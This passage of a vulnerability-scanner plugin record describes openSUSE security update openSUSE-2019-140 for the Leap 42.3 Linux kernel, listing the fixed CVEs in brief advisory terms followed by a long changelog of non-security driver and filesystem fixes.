"p-cpe:/a:novell:opensuse:kernel-vanilla-debugsource", "p-cpe:/a:novell:opensuse:kernel-vanilla-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-debug-debuginfo", "p-cpe:/a:novell:opensuse:kernel-vanilla-debuginfo", "p-cpe:/a:novell:opensuse:kernel-default-debugsource", "p-cpe:/a:novell:opensuse:kernel-default-debuginfo", "p-cpe:/a:novell:opensuse:kernel-vanilla-base", "p-cpe:/a:novell:opensuse:kernel-debug-devel-debuginfo", 
"p-cpe:/a:novell:opensuse:kernel-default-devel", "p-cpe:/a:novell:opensuse:kernel-devel", "p-cpe:/a:novell:opensuse:kernel-docs-html", "p-cpe:/a:novell:opensuse:kernel-obs-qa", "p-cpe:/a:novell:opensuse:kernel-docs-pdf", "p-cpe:/a:novell:opensuse:kernel-macros", "p-cpe:/a:novell:opensuse:kernel-syms", "p-cpe:/a:novell:opensuse:kernel-vanilla", "p-cpe:/a:novell:opensuse:kernel-vanilla-devel", "p-cpe:/a:novell:opensuse:kernel-debug-base", "p-cpe:/a:novell:opensuse:kernel-debug-debugsource", "p-cpe:/a:novell:opensuse:kernel-default", "p-cpe:/a:novell:opensuse:kernel-debug-devel", "cpe:/o:novell:opensuse:42.3", "p-cpe:/a:novell:opensuse:kernel-debug-base-debuginfo", "p-cpe:/a:novell:opensuse:kernel-debug", "p-cpe:/a:novell:opensuse:kernel-obs-build-debugsource", "p-cpe:/a:novell:opensuse:kernel-default-base", "p-cpe:/a:novell:opensuse:kernel-obs-build", "p-cpe:/a:novell:opensuse:kernel-default-base-debuginfo"], "id": "OPENSUSE-2019-140.NASL", "href": "https://www.tenable.com/plugins/nessus/121633", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-140.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(121633);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2018-1120\", \"CVE-2018-16862\", \"CVE-2018-16884\", \"CVE-2018-19407\", \"CVE-2018-19824\", \"CVE-2018-19985\", \"CVE-2018-20169\", \"CVE-2018-9568\", \"CVE-2019-3459\", \"CVE-2019-3460\");\n\n script_name(english:\"openSUSE Security Update : the Linux Kernel (openSUSE-2019-140)\");\n script_summary(english:\"Check for the openSUSE-2019-140 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security 
update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The openSUSE Leap 42.3 Linux kernel was updated to 4.4.172 to receive\nvarious security and bugfixes.\n\nThe following security bugs were fixed :\n\n - CVE-2019-3459,CVE-2019-3460: Two remote information leak\n vulnerabilities in the Bluetooth stack were fixed that\n could potentially leak kernel information (bsc#1120758)\n\n - CVE-2018-19407: The vcpu_scan_ioapic function in\n arch/x86/kvm/x86.c allowed local users to cause a denial\n of service (NULL pointer dereference and BUG) via\n crafted system calls that reach a situation where ioapic\n is uninitialized (bnc#1116841).\n\n - CVE-2018-19985: The function hso_probe read if_num from\n the USB device (as an u8) and used it without a length\n check to index an array, resulting in an OOB memory read\n in hso_probe or hso_get_config_data that could be used\n by local attackers (bnc#1120743).\n\n - CVE-2018-1120: By mmap()ing a FUSE-backed file onto a\n process's memory containing command line arguments (or\n environment strings), an attacker can cause utilities\n from psutils or procps (such as ps, w) or any other\n program which made a read() call to the\n /proc/<pid>/cmdline (or /proc/<pid>/environ) files to\n block indefinitely (denial of service) or for some\n controlled time (as a synchronization primitive for\n other attacks) (bnc#1087082).\n\n - CVE-2018-16884: NFS41+ shares mounted in different\n network namespaces at the same time can make\n bc_svc_process() use wrong back-channel IDs and cause a\n use-after-free vulnerability. Thus a malicious container\n user can cause a host kernel memory corruption and a\n system panic.
Due to the nature of the flaw, privilege\n escalation cannot be fully ruled out (bnc#1119946).\n\n - CVE-2018-20169: The USB subsystem mishandled size checks\n during the reading of an extra descriptor, related to\n __usb_get_extra_descriptor in drivers/usb/core/usb.c\n (bnc#1119714).\n\n - CVE-2018-9568: In sk_clone_lock of sock.c, there is a\n possible memory corruption due to type confusion. This\n could lead to local escalation of privilege with no\n additional execution privileges needed. User interaction\n is not needed for exploitation. (bnc#1118319).\n\n - CVE-2018-16862: A security flaw was found in a way that\n the cleancache subsystem clears an inode after the final\n file truncation (removal). The new file created with the\n same inode may contain leftover pages from cleancache\n and the old file data instead of the new one\n (bnc#1117186).\n\n - CVE-2018-19824: A local user could exploit a\n use-after-free in the ALSA driver by supplying a\n malicious USB Sound device (with zero interfaces) that\n is mishandled in usb_audio_probe in sound/usb/card.c\n (bnc#1118152).\n\nThe following non-security bugs were fixed :\n\n - 9p/net: put a lower bound on msize (bnc#1012382).\n\n - ACPI/IORT: Fix iort_get_platform_device_domain()\n uninitialized pointer value (bsc#1121239).\n\n - acpi/nfit: Block function zero DSMs (bsc#1123321).\n\n - acpi/nfit: Fix command-supported detection\n (bsc#1123323).\n\n - acpi/nfit, x86/mce: Handle only uncorrectable machine\n checks (bsc#1114648).\n\n - acpi/nfit, x86/mce: Validate a MCE's address before\n using it (bsc#1114648).\n\n - acpi/power: Skip duplicate power resource references in\n _PRx (bnc#1012382).\n\n - acpi/processor: Fix the return value of\n acpi_processor_ids_walk() (git fixes (acpi)).\n\n - aio: fix spectre gadget in lookup_ioctx (bnc#1012382).\n\n - aio: hold an extra file reference over AIO read/write\n operations (bsc#1116027).\n\n - alsa: ac97: Fix incorrect bit shift at AC97-SPSA control\n write 
(bnc#1012382).\n\n - alsa: bebob: fix model-id of unit for Apogee Ensemble\n (bnc#1012382).\n\n - alsa: control: Fix race between adding and removing a\n user element (bnc#1012382).\n\n - alsa: cs46xx: Potential NULL dereference in probe\n (bnc#1012382).\n\n - alsa: emu10k1: Fix potential Spectre v1 vulnerabilities\n (bnc#1012382).\n\n - alsa: emux: Fix potential Spectre v1 vulnerabilities\n (bnc#1012382).\n\n - alsa: hda: add mute LED support for HP EliteBook 840 G4\n (bnc#1012382).\n\n - alsa: hda: Add support for AMD Stoney Ridge\n (bnc#1012382).\n\n - alsa: hda/realtek - Disable headset Mic VREF for headset\n mode of ALC225 (bnc#1012382).\n\n - alsa: hda/tegra: clear pending irq handlers\n (bnc#1012382).\n\n - alsa: isa/wavefront: prevent some out of bound writes\n (bnc#1012382).\n\n - alsa: pcm: Call snd_pcm_unlink() conditionally at\n closing (bnc#1012382).\n\n - alsa: pcm: Fix interval evaluation with openmin/max\n (bnc#1012382).\n\n - alsa: pcm: Fix potential Spectre v1 vulnerability\n (bnc#1012382).\n\n - alsa: pcm: Fix starvation on down_write_nonblock()\n (bnc#1012382).\n\n - alsa: pcm: remove SNDRV_PCM_IOCTL1_INFO internal command\n (bnc#1012382).\n\n - alsa: rme9652: Fix potential Spectre v1 vulnerability\n (bnc#1012382).\n\n - alsa: sparc: Fix invalid snd_free_pages() at error path\n (bnc#1012382).\n\n - alsa: trident: Suppress gcc string warning\n (bnc#1012382).\n\n - alsa: usb-audio: Avoid access before bLength check in\n build_audio_procunit() (bnc#1012382).\n\n - alsa: usb-audio: Fix an out-of-bound read in\n create_composite_quirks (bnc#1012382).\n\n - alsa: wss: Fix invalid snd_free_pages() at error path\n (bnc#1012382).\n\n - arc: change defconfig defaults to ARCv2 (bnc#1012382).\n\n - arc: [devboards] Add support of NFSv3 ACL (bnc#1012382).\n\n - arc: io.h: Implement reads(x)()/writes(x)()\n (bnc#1012382).\n\n - arm64: Do not trap host pointer auth use to EL2\n (bnc#1012382).\n\n - arm64/kvm: consistently handle host HCR_EL2 flags\n 
(bnc#1012382).\n\n - arm64: perf: set suppress_bind_attrs flag to true\n (bnc#1012382).\n\n - arm64: remove no-op -p linker flag (bnc#1012382).\n\n - arm: 8814/1: mm: improve/fix ARM v7_dma_inv_range()\n unaligned address handling (bnc#1012382).\n\n - arm: imx: update the cpu power up timing setting on\n i.mx6sx (bnc#1012382).\n\n - arm: kvm: fix building with gcc-8 (bsc#1121241).\n\n - arm: OMAP1: ams-delta: Fix possible use of uninitialized\n field (bnc#1012382).\n\n - arm: OMAP2+: prm44xx: Fix section annotation on\n omap44xx_prm_enable_io_wakeup (bnc#1012382).\n\n - ASoC: dapm: Recalculate audio map forcely when card\n instantiated (bnc#1012382).\n\n - ASoC: omap-dmic: Add pm_qos handling to avoid overruns\n with CPU_IDLE (bnc#1012382).\n\n - ASoC: omap-mcpdm: Add pm_qos handling to avoid\n under/overruns with CPU_IDLE (bnc#1012382).\n\n - ata: Fix racy link clearance (bsc#1107866).\n\n - ath10k: fix kernel panic due to race in accessing arvif\n list (bnc#1012382).\n\n - ax25: fix a use-after-free in ax25_fillin_cb()\n (bnc#1012382).\n\n - b43: Fix error in cordic routine (bnc#1012382).\n\n - batman-adv: Expand merged fragment buffer for full\n packet (bnc#1012382).\n\n - bfs: add sanity check at bfs_fill_super() (bnc#1012382).\n\n - block/loop: Use global lock for ioctl() operation\n (bnc#1012382).\n\n - block/swim3: Fix -EBUSY error when re-opening device\n after unmount (Git-fixes).\n\n - bnx2x: Assign unique DMAE channel number for FW DMAE\n transactions (bnc#1012382).\n\n - bonding: fix 802.3ad state sent to partner when\n unbinding slave (bnc#1012382).\n\n - bpf: fix check of allowed specifiers in bpf_trace_printk\n (bnc#1012382).\n\n - bpf: support 8-byte metafield access (bnc#1012382).\n\n - bpf, trace: check event type in bpf_perf_event_read\n (bsc#1119970).\n\n - bpf, trace: use READ_ONCE for retrieving file ptr\n (bsc#1119967).\n\n - bpf/verifier: Add spi variable to check_stack_write()\n (bnc#1012382).\n\n - bpf/verifier: Pass instruction index to\n 
check_mem_access() and check_xadd() (bnc#1012382).\n\n - btrfs: Always try all copies when reading extent buffers\n (bnc#1012382).\n\n - btrfs: ensure path name is null terminated at\n btrfs_control_ioctl (bnc#1012382).\n\n - btrfs: Fix memory barriers usage with device stats\n counters (git-fixes).\n\n - btrfs: fix use-after-free when dumping free space\n (bnc#1012382).\n\n - btrfs: Handle error from btrfs_uuid_tree_rem call in\n _btrfs_ioctl_set_received_subvol (git-fixes).\n\n - btrfs: release metadata before running delayed refs\n (bnc#1012382).\n\n - btrfs: send, fix infinite loop due to directory rename\n dependencies (bnc#1012382).\n\n - btrfs: tree-checker: Check level for leaves and nodes\n (bnc#1012382).\n\n - btrfs: tree-checker: Do not check max block group size\n as current max chunk size limit is unreliable (fixes for\n bnc#1012382 bsc#1102875 bsc#1102877 bsc#1102879\n bsc#1102882 bsc#1102896).\n\n - btrfs: tree-checker: Fix misleading group system\n information (bnc#1012382).\n\n - btrfs: tree-check: reduce stack consumption in\n check_dir_item (bnc#1012382).\n\n - btrfs: validate type when reading a chunk (bnc#1012382).\n\n - btrfs: wait on ordered extents on abort cleanup\n (bnc#1012382).\n\n - can: dev: __can_get_echo_skb(): Do not crash the kernel\n if can_priv::echo_skb is accessed out of bounds\n (bnc#1012382).\n\n - can: dev: can_get_echo_skb(): factor out non sending\n code to __can_get_echo_skb() (bnc#1012382).\n\n - can: dev: __can_get_echo_skb(): print error message, if\n trying to echo non existing skb (bnc#1012382).\n\n - can: dev: __can_get_echo_skb(): replace struct can_frame\n by canfd_frame to access frame length (bnc#1012382).\n\n - can: gw: ensure DLC boundaries after CAN frame\n modification (bnc#1012382).\n\n - can: rcar_can: Fix erroneous registration (bnc#1012382).\n\n - cdc-acm: fix abnormal DATA RX issue for Mediatek\n Preloader (bnc#1012382).\n\n - ceph: do not update importing cap's mseq when handing\n cap export 
(bsc#1121275).\n\n - checkstack.pl: fix for aarch64 (bnc#1012382).\n\n - cifs: Do not hide EINTR after sending network packets\n (bnc#1012382).\n\n - cifs: Fix error mapping for SMB2_LOCK command which\n caused OFD lock problem (bnc#1012382).\n\n - cifs: Fix potential OOB access of lock element array\n (bnc#1012382).\n\n - cifs: Fix separator when building path from dentry\n (bnc#1012382).\n\n - cifs: In Kconfig CONFIG_CIFS_POSIX needs depends on\n legacy (insecure cifs) (bnc#1012382).\n\n - clk: imx6q: reset exclusive gates on init (bnc#1012382).\n\n - clk: mmp: Off by one in mmp_clk_add() (bnc#1012382).\n\n - cpufeature: avoid warning when compiling with clang\n (Git-fixes).\n\n - cpufreq: imx6q: add return value check for voltage scale\n (bnc#1012382).\n\n - crypto: authencesn - Avoid twice completion call in\n decrypt path (bnc#1012382).\n\n - crypto: authenc - fix parsing key with misaligned\n rta_len (bnc#1012382).\n\n - crypto: cts - fix crash on short inputs (bnc#1012382).\n\n - crypto: user - support incremental algorithm dumps\n (bsc#1120902).\n\n - crypto: x86/chacha20 - avoid sleeping with preemption\n disabled (bnc#1012382).\n\n - cw1200: Do not leak memory if krealloc failes\n (bnc#1012382).\n\n - debugobjects: avoid recursive calls with kmemleak\n (bnc#1012382).\n\n - Disable MSI also when pcie-octeon.pcie_disable on\n (bnc#1012382).\n\n - disable stringop truncation warnings for now\n (bnc#1012382).\n\n - dlm: fixed memory leaks after failed ls_remove_names\n allocation (bnc#1012382).\n\n - dlm: lost put_lkb on error path in receive_convert() and\n receive_unlock() (bnc#1012382).\n\n - dlm: memory leaks on error path in dlm_user_request()\n (bnc#1012382).\n\n - dlm: possible memory leak on error path in create_lkb()\n (bnc#1012382).\n\n - dmaengine: at_hdmac: fix memory leak in at_dma_xlate()\n (bnc#1012382).\n\n - dmaengine: at_hdmac: fix module unloading (bnc#1012382).\n\n - dm cache metadata: ignore hints array being too small\n during resize 
(Git-fixes).\n\n - dm crypt: add cryptographic data integrity protection\n (authenticated encryption) (Git-fixes).\n\n - dm crypt: factor IV constructor out to separate function\n (Git-fixes).\n\n - dm crypt: fix crash by adding missing check for auth key\n size (git-fixes).\n\n - dm crypt: fix error return code in crypt_ctr()\n (git-fixes).\n\n - dm crypt: fix memory leak in crypt_ctr_cipher_old()\n (git-fixes).\n\n - dm crypt: introduce new format of cipher with 'capi:'\n prefix (Git-fixes).\n\n - dm crypt: wipe kernel key copy after IV initialization\n (Git-fixes).\n\n - dm: do not allow readahead to limit IO size (git fixes\n (readahead)).\n\n - dm kcopyd: Fix bug causing workqueue stalls\n (bnc#1012382).\n\n - dm-multipath: do not assign cmd_flags in setup_clone()\n (bsc#1103156).\n\n - dm snapshot: Fix excessive memory usage and workqueue\n stalls (bnc#1012382).\n\n - dm thin: stop no_space_timeout worker when switching to\n write-mode (Git-fixes).\n\n - drivers: hv: vmbus: check the creation_status in\n vmbus_establish_gpadl() (bsc#1104098).\n\n - drivers: hv: vmbus: Return -EINVAL for the sys files for\n unopened channels (bnc#1012382).\n\n - drivers/sbus/char: add of_node_put() (bnc#1012382).\n\n - drivers/tty: add missing of_node_put() (bnc#1012382).\n\n - drm/ast: change resolution may cause screen blurred\n (bnc#1012382).\n\n - drm/ast: fixed cursor may disappear sometimes\n (bnc#1012382).\n\n - drm/ast: fixed reading monitor EDID not stable issue\n (bnc#1012382).\n\n - drm/ast: Fix incorrect free on ioregs (bsc#1106929)\n\n - drm/fb-helper: Ignore the value of\n fb_var_screeninfo.pixclock (bsc#1106929)\n\n - drm/ioctl: Fix Spectre v1 vulnerabilities (bnc#1012382).\n\n - drm/msm: Grab a vblank reference when waiting for\n commit_done (bnc#1012382).\n\n - drm: rcar-du: Fix external clock error checks\n (bsc#1106929)\n\n - drm: rcar-du: Fix vblank initialization (bsc#1106929)\n\n - e1000e: allow non-monotonic SYSTIM readings\n (bnc#1012382).\n\n - EDAC: 
Raise the maximum number of memory controllers\n (bsc#1120722).\n\n - efi/libstub/arm64: Use hidden attribute for struct\n screen_info reference (bsc#1122650).\n\n - exec: avoid gcc-8 warning for get_task_comm\n (bnc#1012382).\n\n - exportfs: do not read dentry after free (bnc#1012382).\n\n - ext2: fix potential use after free (bnc#1012382).\n\n - ext4: fix a potential fiemap/page fault deadlock w/\n inline_data (bnc#1012382).\n\n - ext4: Fix crash during online resizing (bsc#1122779).\n\n - ext4: fix EXT4_IOC_GROUP_ADD ioctl (bnc#1012382).\n\n - ext4: fix possible use after free in ext4_quota_enable\n (bnc#1012382).\n\n - ext4: force inode writes when nfsd calls\n commit_metadata() (bnc#1012382).\n\n - ext4: missing unlock/put_page() in\n ext4_try_to_write_inline_data() (bnc#1012382).\n\n - f2fs: Add sanity_check_inode() function (bnc#1012382).\n\n - f2fs: avoid unneeded loop in build_sit_entries\n (bnc#1012382).\n\n - f2fs: check blkaddr more accuratly before issue a bio\n (bnc#1012382).\n\n - f2fs: clean up argument of recover_data (bnc#1012382).\n\n - f2fs: clean up with is_valid_blkaddr() (bnc#1012382).\n\n - f2fs: detect wrong layout (bnc#1012382).\n\n - f2fs: enhance sanity_check_raw_super() to avoid\n potential overflow (bnc#1012382).\n\n - f2fs: factor out fsync inode entry operations\n (bnc#1012382).\n\n - f2fs: fix inode cache leak (bnc#1012382).\n\n - f2fs: fix invalid memory access (bnc#1012382).\n\n - f2fs: fix missing up_read (bnc#1012382).\n\n - f2fs: fix to avoid reading out encrypted data in page\n cache (bnc#1012382).\n\n - f2fs: fix to convert inline directory correctly\n (bnc#1012382).\n\n - f2fs: fix to determine start_cp_addr by sbi->cur_cp_pack\n (bnc#1012382).\n\n - f2fs: fix to do sanity check with block address in main\n area (bnc#1012382).\n\n - f2fs: fix to do sanity check with block address in main\n area v2 (bnc#1012382).\n\n - f2fs: fix to do sanity check with cp_pack_start_sum\n (bnc#1012382).\n\n - f2fs: fix to do sanity check with 
node footer and\n iblocks (bnc#1012382).\n\n - f2fs: fix to do sanity check with reserved blkaddr of\n inline inode (bnc#1012382).\n\n - f2fs: fix to do sanity check with secs_per_zone\n (bnc#1012382).\n\n - f2fs: fix to do sanity check with user_block_count\n (bnc#1012382).\n\n - f2fs: fix validation of the block count in\n sanity_check_raw_super (bnc#1012382).\n\n - f2fs: free meta pages if sanity check for ckpt is failed\n (bnc#1012382).\n\n - f2fs: give -EINVAL for norecovery and rw mount\n (bnc#1012382).\n\n - f2fs: introduce and spread verify_blkaddr (bnc#1012382).\n\n - f2fs: introduce get_checkpoint_version for cleanup\n (bnc#1012382).\n\n - f2fs: move sanity checking of cp into\n get_valid_checkpoint (bnc#1012382).\n\n - f2fs: not allow to write illegal blkaddr (bnc#1012382).\n\n - f2fs: put directory inodes before checkpoint in\n roll-forward recovery (bnc#1012382).\n\n - f2fs: remove an obsolete variable (bnc#1012382).\n\n - f2fs: return error during fill_super (bnc#1012382).\n\n - f2fs: sanity check on sit entry (bnc#1012382).\n\n - f2fs: use crc and cp version to determine roll-forward\n recovery (bnc#1012382).\n\n - fbdev: fbcon: Fix unregister crash when more than one\n framebuffer (bsc#1106929)\n\n - fbdev: fbmem: behave better with small rotated displays\n and many CPUs (bsc#1106929)\n\n - fix fragmentation series\n\n - Fix problem with sharetransport= and NFSv4\n (bsc#1114893).\n\n - floppy: fix race condition in __floppy_read_block_0()\n (Git-fixes).\n\n - fork: record start_time late (bnc#1012382).\n\n - fscache, cachefiles: remove redundant variable 'cache'\n (bnc#1012382).\n\n - fscache: Fix race in fscache_op_complete() due to split\n atomic_sub & read (Git-fixes).\n\n - fscache: Pass the correct cancelled indications to\n fscache_op_complete() (Git-fixes).\n\n - genwqe: Fix size check (bnc#1012382).\n\n - gfs2: Do not leave s_fs_info pointing to freed memory in\n init_sbd (bnc#1012382).\n\n - gfs2: Fix loop in gfs2_rbm_find 
(bnc#1012382).\n\n - git_sort.py: Remove non-existent remote tj/libata\n\n - gpiolib: Fix return value of gpio_to_desc() stub if\n !GPIOLIB (Git-fixes).\n\n - gpio: max7301: fix driver for use with CONFIG_VMAP_STACK\n (bnc#1012382).\n\n - gro_cell: add napi_disable in gro_cells_destroy\n (bnc#1012382).\n\n - hfs: do not free node before using (bnc#1012382).\n\n - hfsplus: do not free node before using (bnc#1012382).\n\n - hpwdt add dynamic debugging (bsc#1114417).\n\n - hpwdt calculate reload value on each use (bsc#1114417).\n\n - hugetlbfs: fix bug in pgoff overflow checking\n (bnc#1012382).\n\n - hwmon: (ina2xx) Fix current value calculation\n (bnc#1012382).\n\n - hwmon: (w83795) temp4_type has writable permission\n (bnc#1012382).\n\n - hwpoison, memory_hotplug: allow hwpoisoned pages to be\n offlined (bnc#1116336).\n\n - i2c: axxia: properly handle master timeout\n (bnc#1012382).\n\n - i2c: dev: prevent adapter retries and timeout being set\n as minus value (bnc#1012382).\n\n - i2c: scmi: Fix probe error on devices with an empty\n SMB0001 ACPI device node (bnc#1012382).\n\n - ib/hfi1: Fix an out-of-bounds access in get_hw_stats ().\n\n - ibmveth: Do not process frames after calling\n napi_reschedule (bcs#1123357).\n\n - ibmveth: fix DMA unmap error in ibmveth_xmit_start error\n path (bnc#1012382).\n\n - ibmvnic: Add ethtool private flag for driver-defined\n queue limits (bsc#1121726).\n\n - ibmvnic: Convert reset work item mutex to spin lock ().\n\n - ibmvnic: Fix non-atomic memory allocation in IRQ context\n ().\n\n - ibmvnic: Increase maximum queue size limit\n (bsc#1121726).\n\n - ibmvnic: Introduce driver limits for ring sizes\n (bsc#1121726).\n\n - ide: pmac: add of_node_put() (bnc#1012382).\n\n - ieee802154: lowpan_header_create check must check daddr\n (bnc#1012382).\n\n - input: elan_i2c - add ACPI ID for Lenovo IdeaPad\n 330-15ARR (bnc#1012382).\n\n - input: elan_i2c - add ACPI ID for touchpad in ASUS\n Aspire F5-573G (bnc#1012382).\n\n - input: 
elan_i2c - add ELAN0620 to the ACPI table\n (bnc#1012382).\n\n - input: elan_i2c - add support for ELAN0621 touchpad\n (bnc#1012382).\n\n - input: matrix_keypad - check for errors from\n of_get_named_gpio() (bnc#1012382).\n\n - input: omap-keypad - fix idle configuration to not block\n SoC idle states (bnc#1012382).\n\n - input: omap-keypad - fix keyboard debounce configuration\n (bnc#1012382).\n\n - input: restore EV_ABS ABS_RESERVED (bnc#1012382).\n\n - input: xpad - add GPD Win 2 Controller USB IDs\n (bnc#1012382).\n\n - input: xpad - add Mad Catz FightStick TE 2 VID/PID\n (bnc#1012382).\n\n - input: xpad - add more third-party controllers\n (bnc#1012382).\n\n - input: xpad - add PDP device id 0x02a4 (bnc#1012382).\n\n - input: xpad - add product ID for Xbox One S pad\n (bnc#1012382).\n\n - input: xpad - add support for PDP Xbox One controllers\n (bnc#1012382).\n\n - input: xpad - add support for Xbox1 PDP Camo series\n gamepad (bnc#1012382).\n\n - input: xpad - add USB IDs for Mad Catz Brawlstick and\n Razer Sabertooth (bnc#1012382).\n\n - input: xpad - avoid using __set_bit() for capabilities\n (bnc#1012382).\n\n - input: xpad - constify usb_device_id (bnc#1012382).\n\n - input: xpad - correctly sort vendor id's (bnc#1012382).\n\n - input: xpad - correct xbox one pad device name\n (bnc#1012382).\n\n - input: xpad - do not depend on endpoint order\n (bnc#1012382).\n\n - input: xpad - fix GPD Win 2 controller name\n (bnc#1012382).\n\n - input: xpad - fix PowerA init quirk for some gamepad\n models (bnc#1012382).\n\n - input: xpad - fix rumble on Xbox One controllers with\n 2015 firmware (bnc#1012382).\n\n - input: xpad - fix some coding style issues\n (bnc#1012382).\n\n - input: xpad - fix stuck mode button on Xbox One S pad\n (bnc#1012382).\n\n - input: xpad - fix Xbox One rumble stopping after 2.5\n secs (bnc#1012382).\n\n - input: xpad - handle 'present' and 'gone' correctly\n (bnc#1012382).\n\n - input: xpad - move reporting xbox one home button to\n common 
function (bnc#1012382).\n\n - input: xpad - power off wireless 360 controllers on\n suspend (bnc#1012382).\n\n - input: xpad - prevent spurious input from wired Xbox 360\n controllers (bnc#1012382).\n\n - input: xpad - quirk all PDP Xbox One gamepads\n (bnc#1012382).\n\n - input: xpad - remove spurious events of wireless xpad\n 360 controller (bnc#1012382).\n\n - input: xpad - remove unused function (bnc#1012382).\n\n - input: xpad - restore LED state after device resume\n (bnc#1012382).\n\n - input: xpad - simplify error condition in init_output\n (bnc#1012382).\n\n - input: xpad - sort supported devices by USB ID\n (bnc#1012382).\n\n - input: xpad - support some quirky Xbox One pads\n (bnc#1012382).\n\n - input: xpad - sync supported devices with 360Controller\n (bnc#1012382).\n\n - input: xpad - sync supported devices with XBCD\n (bnc#1012382).\n\n - input: xpad - sync supported devices with xboxdrv\n (bnc#1012382).\n\n - input: xpad - update Xbox One Force Feedback Support\n (bnc#1012382).\n\n - input: xpad - use LED API when identifying wireless\n controllers (bnc#1012382).\n\n - input: xpad - validate USB endpoint type during probe\n (bnc#1012382).\n\n - input: xpad - workaround dead irq_out after suspend/\n resume (bnc#1012382).\n\n - input: xpad - xbox one elite controller support\n (bnc#1012382).\n\n - intel_th: msu: Fix an off-by-one in attribute store\n (bnc#1012382).\n\n - iommu/amd: Call free_iova_fast with pfn in map_sg\n (bsc#1106105).\n\n - iommu/amd: Fix amd_iommu=force_isolation (bsc#1106105).\n\n - iommu/amd: Fix IOMMU page flush when detach device from\n a domain (bsc#1106105).\n\n - iommu/amd: Unmap all mapped pages in error path of\n map_sg (bsc#1106105).\n\n - iommu/vt-d: Fix memory leak in\n intel_iommu_put_resv_regions() (bsc#1106105).\n\n - iommu/vt-d: Handle domain agaw being less than iommu\n agaw (bsc#1106105).\n\n - ip6mr: Fix potential Spectre v1 vulnerability\n (bnc#1012382).\n\n - ipmi:ssif: Fix handling of multi-part return 
messages\n (bnc#1012382).\n\n - ip: on queued skb use skb_header_pointer instead of\n pskb_may_pull (bnc#1012382).\n\n - ip_tunnel: Fix name string concatenate in\n __ip_tunnel_create() (bnc#1012382).\n\n - ipv4: Fix potential Spectre v1 vulnerability\n (bnc#1012382).\n\n - ipv4: ipv6: netfilter: Adjust the frag mem limit when\n truesize changes (bsc#1110286).\n\n - ipv6: Check available headroom in ip6_xmit() even\n without options (bnc#1012382).\n\n - ipv6: Consider sk_bound_dev_if when binding a socket to\n a v4 mapped address (bnc#1012382).\n\n - ipv6: explicitly initialize udp6_addr in\n udp_sock_create6() (bnc#1012382).\n\n - ipv6: fix kernel-infoleak in ipv6_local_error()\n (bnc#1012382).\n\n - ipv6: Take rcu_read_lock in __inet6_bind for mapped\n addresses (bnc#1012382).\n\n - isdn: fix kernel-infoleak in capi_unlocked_ioctl\n (bnc#1012382).\n\n - iser: set sector for ambiguous mr status errors\n (bnc#1012382).\n\n - iwlwifi: mvm: fix regulatory domain update when the\n firmware starts (bnc#1012382).\n\n - iwlwifi: mvm: support sta_statistics() even on older\n firmware (bnc#1012382).\n\n - ixgbe: Add function for checking to see if we can reuse\n page (bsc#1100105).\n\n - ixgbe: Add support for build_skb (bsc#1100105).\n\n - ixgbe: Add support for padding packet (bsc#1100105).\n\n - ixgbe: Break out Rx buffer page management\n (bsc#1100105).\n\n - ixgbe: Fix output from ixgbe_dump (bsc#1100105).\n\n - ixgbe: fix possible race in reset subtask (bsc#1101557).\n\n - ixgbe: Make use of order 1 pages and 3K buffers\n independent of FCoE (bsc#1100105).\n\n - ixgbe: Only DMA sync frame length (bsc#1100105).\n\n - ixgbe: recognize 1000BaseLX SFP modules as 1Gbps\n (bnc#1012382).\n\n - ixgbe: Refactor queue disable logic to take completion\n time into account (bsc#1101557).\n\n - ixgbe: Reorder Tx/Rx shutdown to reduce time needed to\n stop device (bsc#1101557).\n\n - ixgbe: Update code to better handle incrementing page\n count (bsc#1100105).\n\n - ixgbe: Update 
driver to make use of DMA attributes in Rx\n path (bsc#1100105).\n\n - ixgbe: Use length to determine if descriptor is done\n (bsc#1100105).\n\n - jffs2: Fix use of uninitialized delayed_work, lockdep\n breakage (bnc#1012382).\n\n - kabi: hwpoison, memory_hotplug: allow hwpoisoned pages\n to be offlined (bnc#1116336).\n\n - kabi: reorder new slabinfo fields in struct\n kmem_cache_node (bnc#1116653).\n\n - kbuild: suppress packed-not-aligned warning for default\n setting only (bnc#1012382).\n\n - kconfig: fix file name and line number of\n warn_ignored_character() (bnc#1012382).\n\n - kconfig: fix memory leak when EOF is encountered in\n quotation (bnc#1012382).\n\n - kdb: use memmove instead of overlapping memcpy\n (bnc#1012382).\n\n - kdb: Use strscpy with destination buffer size\n (bnc#1012382).\n\n - kernfs: Replace strncpy with memcpy (bnc#1012382).\n\n - kgdboc: fix KASAN global-out-of-bounds bug in\n param_set_kgdboc_var() (bnc#1012382).\n\n - kgdboc: Fix restrict error (bnc#1012382).\n\n - kgdboc: Fix warning with module build (bnc#1012382).\n\n - kobject: Replace strncpy with memcpy (bnc#1012382).\n\n - kvm/arm64: Fix caching of host MDCR_EL2 value\n (bsc#1121242).\n\n - kvm/arm: Restore banked registers and physical timer\n access on hyp_panic() (bsc#1121240).\n\n - kvm/mmu: Fix race in emulated page table writes\n (bnc#1012382).\n\n - kvm/nVMX: Eliminate vmcs02 pool (bnc#1012382).\n\n - kvm/nVMX: mark vmcs12 pages dirty on L2 exit\n (bnc#1012382).\n\n - kvm/PPC: Move and undef TRACE_INCLUDE_PATH/FILE\n (bnc#1012382).\n\n - kvm/svm: Allow direct access to MSR_IA32_SPEC_CTRL\n (bnc#1012382 bsc#1068032).\n\n - kvm/svm: Ensure an IBPB on all affected CPUs when\n freeing a vmcb (bsc#1114648).\n\n - kvm/VMX: Allow direct access to MSR_IA32_SPEC_CTRL\n (bnc#1012382 bsc#1068032 bsc#1096242 bsc#1096281).\n\n - kvm/VMX: Emulate MSR_IA32_ARCH_CAPABILITIES\n (bnc#1012382).\n\n - kvm/VMX: introduce alloc_loaded_vmcs (bnc#1012382).\n\n - kvm/VMX: make MSR bitmaps 
